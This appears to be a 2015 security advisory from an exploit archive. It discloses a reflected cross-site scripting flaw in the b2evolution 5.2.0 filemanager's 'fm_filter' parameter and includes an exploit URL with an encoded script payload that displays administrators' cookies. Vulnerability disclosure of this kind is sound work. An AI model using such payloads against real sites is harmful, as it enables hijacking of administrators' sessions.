CMS b2evolution 5.2.0 Cross Site Scripting

CMS b2evolution 5.2.0 Cross Site Scripting: Posted Jan 14, 2015; Authored by Steffen Roesemann; CMS b2evolution version 5.2.0 suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 4b95a602e4064b14c1925613d95f0cd6ab4878e0ce547bf1e2ca309b92c192e4; Download | Favorite | View

CMS b2evolution 5.2.0 Cross Site Scripting

Advisory: Reflecting XSS vulnerability in CMS filemanager of b2evolution v.
5.2.0
Advisory ID: SROEADV-2014-09
Author: Steffen Rösemann
Affected Software: CMS b2evolution v. 5.2.0 (Release-Date: 6th-Dec-2014)
Vendor URL: https://b2evolution.net/
Vendor Status: did not respond to issue
CVE-ID: -

==========================
Vulnerability Description:
==========================

The filemanager of b2evolution v. 5.2.0 is prone to reflecting XSS attacks.

==================
Technical Details:
==================

By appending aribitrary HTML- and/or JavaScriptcode to the "fm_filter"
parameter of the URL where the filemanager functionality of b2eveolution is
located, an attacker could trick an authenticated administrative user to
execute the code.

Filemanager is located here on a common b2evolution installation:

https://
{TARGET}/blogs/admin.php?fm_filter=&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc=

Exploit-Example:

https://
{TARGET}/blogs/admin.php?fm_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc=

=========
Solution:
=========

Vendor did not respond and submitted no solution.

====================
Disclosure Timeline:
====================

30-Dec-2014 – found the vulnerability
30-Dec-2014 - informed the developers (incl. announcement to release
technical details on 13th Jan 2015 if there is no response)
30-Dec-2014 – release date of this security advisory [without technical
details]
13-Jan-2015 - vendor did not respond
13-Jan-2015 - release date of this security advisory
13-Jan-2015 - send to lists



========
Credits:
========

Vulnerability found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] https://b2evolution.net/
[2] https://sroesemann.blogspot.de/2014/12/sroeadv-2014-09.html
[3]
https://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2014-09.html

Top Authors In Last 30 Days

Red Hat 272 files
Ubuntu 56 files
Debian 19 files
LiquidWorm 18 files
Apple 9 files
Gentoo 5 files
Google Security Research 3 files
Chokri Hammedi 3 files
Alter Prime 3 files
Valentin Lobstein 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,937)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,337)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,979)
UNIX (9,475)
UnixWare (188)
Windows (6,784)
Other

CMS b2evolution 5.2.0 Cross Site Scripting

CMS b2evolution 5.2.0 Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

CMS b2evolution 5.2.0 Cross Site Scripting

Share This

CMS b2evolution 5.2.0 Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems